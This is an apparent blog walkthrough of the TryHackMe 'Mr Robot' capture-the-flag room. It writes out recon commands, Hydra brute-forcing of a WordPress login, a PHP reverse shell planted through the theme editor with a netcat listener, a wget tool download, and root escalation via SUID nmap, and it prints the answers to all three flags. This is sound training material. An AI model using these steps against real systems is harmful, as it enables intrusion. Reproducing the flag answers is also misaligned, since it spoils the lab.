Hi! It is time to look at the Mr Robot CTF room on TryHackMe. I am making these walkthroughs to keep myself motivated to learn cyber security, and ensure that I remember the knowledge gained by THMs rooms.
Join me on learning cyber security. I will try and explain concepts as I go, to differentiate myself from other walkthroughs.
Room URL: https://tryhackme.com/room/mrrobot
Task 1 (Connect to our network)
Simply start up the machine on THM, and connect to it through OpenVPN or start up an AttackBox.
Let’s move on!
Task 2 (Hack the machine)
Alright. Let’s get this party started!
This is a open ended challenge, meaning there are no instructions. Let’s start exploring the box to see if we can find some hints.
We can start like we are used to. Let’s run some basic nmap scans:
nmap -sV -sC -v <target ip>
The argument –sV does version detection, –sC runs some basic scripts, while -v adds some more logging. This should be enough to get started.
This simply shows two open ports: port 80 for http and port 443 running https. This means there is a website running on the address.
Visit the ip address in a browser. You should see some animations running and after the page is loaded you will get to the following screen:
We can run six different commands. They are run different clips.
Let’s have a look at the source code:
Nothing here but some “YOU ARE NOT ALONE” message.
Besides looking for the source code we can also have a look ath the robots.txt file, which is used by search engine crawlers to understand which files they are allowed to parse.
This file is accessible by adding /robots.txt to the root url. We can read the following:
This is interesting. The contents point to a dictionary file with words which can be found at the root
But more interesting for now is the text file with the name “key-1-of-3.txt. This includes the key!
What is key 1?
Answer: 073403c8a58a1f80d943455fb30724b9
Let’s continue hacking. We have this dictionary with a bunch of words in it, but we are unsure for now where to use it.
At this point I recommend running gobuster, which can find directories and file in websites.
Let’s run the tool by entering:
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u <target ip>
This finds a variety of pages.
For example sitemap:
Intro:
Readme:
License:
I nearly went past this, but remember to scroll down!
This gives us a password (?):
ZWxsaW90OkVSMjgtMDY1Mgo=
The first thing I thought was that this was a key, but it does not work on THM. Then I figured out it was a base64 string that needs to be decoded.
Enter the following command in the terminal:
echo ZWxsaW90OkVSMjgtMDY1Mgo= | base64 --decode
This returns: elliot:ER28–0652
This looks like a username and password. But to what?
Let’s move on.
While I figured this out gobuster found a WordPress login page:
Maybe we can use the password here and username here? This actually works in and we can login!
But there is another way of figuring out the username and password if you missed the base64 string on the license page.
Try a random username and password and notice the error message! The login page actually mentions that the username is wrong. This is a major vulnerability since it gives us the possibility to try many different usernames and see which one is right.
Maybe the dictionary file can help us, as this might contain possible usernames that can be combined with the previously found password. We need hydra to crack the password, and to exploit the previously mentioned weakness.
For this, let’s use Burp Suite! We can use Burp Suite to see the type of POST request that is made when trying to login. Afterwards we can use this port request with Hydra.
Make sure the FoxyProxy Firefox plugin has the Burp proxy turned on:
Open BurpSuite, and move the Proxy → Intercept screen. Make sure intercept is on like below:
Keep pressing forward on each intercepted request until you see the login post request:
The important part is this:
log=admin&pwd=password&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.63.219%2Fwp-admin%2F&testcookie=1
This shows which parameters the web service is expecting from the post request.
Remember to turn of the intercept now. Now it’s time for Hydra!
Enter the following command:
hydra -L fsocity.dic -p "test" <target ip> http-post-form "/wp-login.php:log=^USER^&pwd=^PWD^:Invalid username" -v
Let’s walk through this together.
- The L flag means that you load a list of passwords to try from a text file. (lowercase l would mean a static username)
- The p flag means you give it a static password. (P would mean a list of passwords)
- http-post-form represents the type of service
- “/wp-login.php:log=^USER^&pwd=^PWD^:Invalid username” looks more tricky that it is.
- -v gives the program more verbosity
Start it up and let it run. At some point you should find the username: Elliot
If you enter this username on the login screen you get the following message:
This confirms that the username is correct, but the password is wrong.
Now that we know the username we can do the opposite procedure in Hydra, to crack the password:
hydra -l Elliot -P ~/Downloads/fsocity.dic <target ip> http-post-form “/wp-login.php:log=^USER^&pwd=^PWD^:incorrect”
We will find the password:
ER28–0652
Now it is time to login. It works! But we already knew that after we decoded the base64 string found on the license page.
Let’s have a look around in WordPress. Nothing seems out of the ordinary. There is a couple of things we can do. Let’s look at the installed version of WordPress to see if it has any vulnerabilities.
We could possibly create a remote shell connection by inserting some php code in the theme editor settings (Appearance -> Editor).
Get a reverse shell script here:
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
Copy the whole thing over in the theme editor settings for page.php.You can paste it at the top, after the <?php opening tag. Before you save, you should edit the ip adress and port number to fit your needs.
If you are in a doubt about your ip, use the ifconfig command in your terminal and look at the tun0 adapter. Look for the ip written after inet.
Save the file, and start up a netcat listener (keeping in mind the port you chose!):
nc -lvnp 12345
Now, all that is needed is to run the php file. It is located at the following address:
https://10.10.248.80/wp-content/themes/twentyfifteen/404.php
Run this and you should get a reverse shell. Before you celebrate though we need to upgrade the shell so we can use it. It is ‘dumb’ right now. We can do this by entering:
python -c 'import pty; pty.spawn("/bin/bash")'
Voila, we got a more interactive shell:
Let’s see what we can find. There are some interesting files in the home directory of the robot user. Unfortunately we can’t read the key-2-of-3.txt file. But there is a hashed password for the robot user in the password.raw-md5 file.
The hash is c3fcd3d76192e4007dfb496cca67e13b and I decided to crack it on CrackStation. This results in the following password: abcdefghijklmnopqrstuvwxyz
Now all that remains is to change user with the su command:
su robot
Enter the password and read the key:
We got it..pfew!
What is key 2?
Answer: 822c73956184f694993bede3eb39f959
Now we need to look for further vulnerabilities. For this we can use a tool such as LinEnum. But we need to get this program on the target pc, which we can do by starting a Python webserver on our attacker pc, and then we can fetch the program through curl.
python -m http.server
Now move to the tmp directory, otherwise you won’t have permissions to write the file. Now let’s fetch the file from our machine:
wget <ip>:8000/LinEnum.sh
There it is:
Now we got the LinEnum.sh script on the attacker pc. Let’s run it:
sh LinEnum.sh
There is a lot of output, but the following stands out:
This is interesting since if the SUID bit is enabled on a file non-root users can possibly use this to escalate root access privileges .
Now we know this is the case for the nmap binary we can read more about our possibilities on gtfobins:
https://gtfobins.github.io/gtfobins/nmap/
Since the system has nmap 3.x running we can read that we can do the following:
What are you waiting for? Let’s give it a try:
nmap –interactive
Followed by:
!sh
If you run whoami know you can see we got root:
HURRAH! Go the home directory of the root user (/root) and list the files and directories. There is the flag!
Read it and we win! 🙂
What is key 3?
Answer: 04787ddef27c3dee1ee161b21670b4e4
Another room done, great job! Be sure to leave a clap or two if you liked this article 🙂
If you want, you can even leave 50 claps by holding the clap button 😉
Happy Hacking!
Like my articles?
You are welcome to give my article a clap or two 🙂
I would be so grateful if you support me by buying me a cup of coffee:
I learned a lot through HackTheBox’s Academy. If you want to sign up, you can get extra cubes, and support me in the process, if you use the following link: